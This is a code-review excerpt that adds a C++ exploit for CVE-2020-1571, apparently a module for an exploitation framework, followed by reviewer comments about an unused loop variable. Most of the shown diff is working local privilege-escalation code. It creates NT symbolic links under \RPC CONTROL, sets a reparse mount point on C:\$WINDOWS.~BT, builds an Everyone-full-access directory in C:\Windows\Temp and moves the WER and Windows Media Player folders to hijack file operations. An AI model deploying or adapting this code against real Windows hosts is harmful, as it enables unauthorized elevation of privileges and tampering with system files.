external/source/exploits/CVE-2020-1571/CVE-2020-1571/exploit.cpp

```diff
@@ -0,0 +1,208 @@
+
+	HANDLE hLink;
+
+	NTSTATUS status = fNtCreateSymbolicLinkObject(&hLink,
+		SYMBOLIC_LINK_ALL_ACCESS, &objAttr, &target);
+	if (status == 0)
+	{
+		return hLink;
+	}
+	else
+	{
+		SetLastError(NtStatusToDosError(status));
+		return nullptr;
+	}
+}
+BOOL makedir(string dir) {
+	//this function will create a directory that allow everyone to have full access on it
+	//due to the default ACL in c:\windows\temp which doesn't allow a standard user to have
+	//a read access to the subcontent
+	SID_IDENTIFIER_AUTHORITY SIDAuthWorld = SECURITY_WORLD_SID_AUTHORITY;
+	PSID everyone_sid = NULL;
+	AllocateAndInitializeSid(&SIDAuthWorld, 1, SECURITY_WORLD_RID,
+		0, 0, 0, 0, 0, 0, 0, &everyone_sid);
+	EXPLICIT_ACCESS ea;
+	ZeroMemory(&ea, sizeof(EXPLICIT_ACCESS));
+	ea.grfAccessPermissions = SPECIFIC_RIGHTS_ALL | STANDARD_RIGHTS_ALL;//full access to everyone
+	ea.grfAccessMode = SET_ACCESS;
+	ea.grfInheritance = NO_INHERITANCE;
+	ea.Trustee.TrusteeForm = TRUSTEE_IS_SID;
+	ea.Trustee.TrusteeType = TRUSTEE_IS_WELL_KNOWN_GROUP;
+	ea.Trustee.ptstrName = (LPWSTR)everyone_sid;//everyone sid
+	PACL acl = NULL;
+	SetEntriesInAcl(1, &ea, NULL, &acl);
+	PSECURITY_DESCRIPTOR sd = (PSECURITY_DESCRIPTOR)LocalAlloc(LPTR,
+		SECURITY_DESCRIPTOR_MIN_LENGTH);
+	InitializeSecurityDescriptor(sd, SECURITY_DESCRIPTOR_REVISION);
+	SetSecurityDescriptorDacl(sd, TRUE, acl, FALSE);
+	SECURITY_ATTRIBUTES sa;
+	sa.nLength = sizeof(SECURITY_ATTRIBUTES);
+	sa.lpSecurityDescriptor = sd;
+	sa.bInheritHandle = FALSE;
+
+	return CreateDirectoryA(dir.c_str(), &sa);
+
+}
+
+void wercb() {
+	/// move both directories wer and wmp in c:\windows\temp\asm*.tmp
+	/// it's needed in order to wipe C:\\$WINDOWS.~BT
+	/// so we can set a reparse point
+	wchar_t pp[MAX_PATH];
+	GetTempFileName(L"C:\\Windows\\Temp", L"asm", NULL, pp);
+	if (!MoveByHandle(wer, pp)) {
+		ExitProcess(EXIT_FAILURE);
+	}
+	wchar_t pp2[MAX_PATH];
+	GetTempFileName(L"C:\\Windows\\Temp", L"asm", NULL, pp2);
+	if (!MoveByHandle(wmp, pp2)) {
+		ExitProcess(EXIT_FAILURE);
+	}
+	lnk = CreateSymlink(NULL, L"\\RPC CONTROL\\WER", L"\\??\\C:\\ProgramData\\Microsoft\\Windows\\WER");
+	if (lnk == INVALID_HANDLE_VALUE) {
+		ExitProcess(EXIT_FAILURE);
+	}
+	lnk2 = CreateSymlink(NULL, L"\\RPC CONTROL\\wmp", L"\\??\\C:\\Program Files\\Windows Media Player");
+	if (lnk2 == INVALID_HANDLE_VALUE) {
+		ExitProcess(EXIT_FAILURE);
+	}
+	hdir = CreateFileA("C:\\$WINDOWS.~BT", GENERIC_WRITE,
+		FULL_SHARING
+		, NULL, OPEN_EXISTING, FILE_FLAG_DELETE_ON_CLOSE | FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OPEN_REPARSE_POINT, NULL);
+	if (!ReparsePoint::CreateMountPoint(hdir, L"\\RPC CONTROL\\", L"")) {
+		ExitProcess(EXIT_FAILURE);
+	}
+}
+
+void WaitServiceToExit() {
+	SC_HANDLE svc = OpenService(OpenSCManager(NULL, NULL, GENERIC_READ), L"WMPNetworkSvc", SERVICE_QUERY_STATUS);
+	SERVICE_STATUS status;
+	QueryServiceStatus(svc, &status);
+	bool once = true;
+	while (status.dwCurrentState != SERVICE_STOPPED) {
+		if (once) {
+			once = false;
+		}

```

Comment:
Is `once` actually referenced anywhere? It looks like you clear it here if it's set but I don't see where it's used.

Reply:
Hmm this wasn't my code, it was copied from the author's code. That being said it appears to be a local variable as its being set to `true` on the line above. I think the idea was to check if the loop had only executed once or not but the logic as its coded right now doesn't really do that and I can't see a point for this variable existing.

Also looked at the other code and confirmed this isn't being used elsewhere. I'll remove this so long.

Reply:
Will be removed with next commit.